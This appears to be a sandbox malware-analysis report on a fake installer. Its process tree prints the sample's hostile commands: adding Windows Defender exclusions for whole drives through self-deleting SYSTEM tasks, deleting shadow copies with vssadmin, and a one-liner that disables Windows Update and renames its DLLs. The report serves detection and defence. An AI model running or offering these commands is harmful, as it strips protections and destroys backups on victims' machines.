Analysis

  • max time kernel
    132s
  • max time network
    153s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260710-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260710-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    19/08/2026, 04:37

General

  • Target
    install_v6.1.0.08.exe
  • Size 37.1MB
  • Sample260819-e83rpsdn9t
  • SHA256 9cc4c6b0f959a85b2997922417c68088b947d974cedf3da6a9b9338226fd1f04
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 16 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 1 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 18 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 29 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\install_v6.1.0.08.exe
    "C:\Users\Admin\AppData\Local\Temp\install_v6.1.0.08.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:3364
  • C:\Users\Public\dr2Cs2\NFAF8C.exe
    "C:\Users\Public\dr2Cs2\NFAF8C.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:5492
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:5152
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\dr2Cs2\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:1856
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\dr2Cs2\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2820
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:5904
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:4556
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4632
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3340
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:2596
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:4652
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:3476
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3344
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:4660
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:4480
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:3464
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3952
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:3460
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:1076
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:1828
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:4316
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:6008
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:3332
                        • C:\Program Files (x86)\TlfmGo\TlfmGo.exe
                          "C:\Program Files (x86)\TlfmGo\TlfmGo.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:2632
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            PID:3656
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2844
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\TlfmGo" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:5788
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4852
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:3020
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:5004
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:1720
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:700
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:1752
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:3120
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure wuauserv reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:2100
                            • C:\Windows\SysWOW64\net.exe
                              net stop UsoSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:1776
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop UsoSvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:5648
                            • C:\Windows\SysWOW64\sc.exe
                              sc config UsoSvc start= disabled
                              4⤵
                              • Launches sc.exe
                              PID:5384
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure UsoSvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:5884
                            • C:\Windows\SysWOW64\net.exe
                              net stop uhssvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:4144
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop uhssvc
                                5⤵
                                  PID:1704
                              • C:\Windows\SysWOW64\sc.exe
                                sc config uhssvc start= disabled
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:2872
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure uhssvc reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:2196
                              • C:\Windows\SysWOW64\net.exe
                                net stop WaaSMedicSvc
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:3068
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop WaaSMedicSvc
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1108
                              • C:\Windows\SysWOW64\sc.exe
                                sc config WaaSMedicSvc start= disabled
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:3536
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure WaaSMedicSvc reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:4612
                              • C:\Windows\SysWOW64\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5804
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:5152
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4844
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:5168
                              • C:\Windows\SysWOW64\takeown.exe
                                takeown /f C:\Windows\System32\wuaueng.dll
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3220
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:3404
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3216
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:2056
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:2932
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:5412
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:2664
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2408
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\TlfmGo\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                              3⤵
                              • Indicator Removal: Clear Persistence
                              • Suspicious use of WriteProcessMemory
                              PID:3028
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\TlfmGo\" /t REG_DWORD /d 0 /f"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:4732
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Run /TN "Task1"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:704
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                  PID:2576
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                3⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:5292
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:2136
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:1440
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:5556
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo\TlfmGo.exe" /inheritance:r
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:4500
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo\TlfmGo.exe" /inheritance:r
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:4124
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo\TlfmGo.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                3⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:3844
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo\TlfmGo.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:1860
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo\TlfmGo.exe" /grant:r Users:(RX) /deny Users:(DE)
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:2400
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo\TlfmGo.exe" /grant:r Users:(RX) /deny Users:(DE)
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:5172
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo\image.png" /inheritance:r
                                3⤵
                                • Executes a command shell one-liner
                                PID:2800
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo\image.png" /inheritance:r
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:3824
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:5860
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:692
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                3⤵
                                • Executes a command shell one-liner
                                PID:2524
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:2360
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo\thumbs.db" /inheritance:r
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:3192
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo\thumbs.db" /inheritance:r
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:5540
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:1724
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:5496
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:6048
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:1236
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo\XPSPLOG.dll" /inheritance:r
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:3128
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo\XPSPLOG.dll" /inheritance:r
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:4332
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • System Location Discovery: System Language Discovery
                                PID:4724
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2772
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:6136
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2572
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
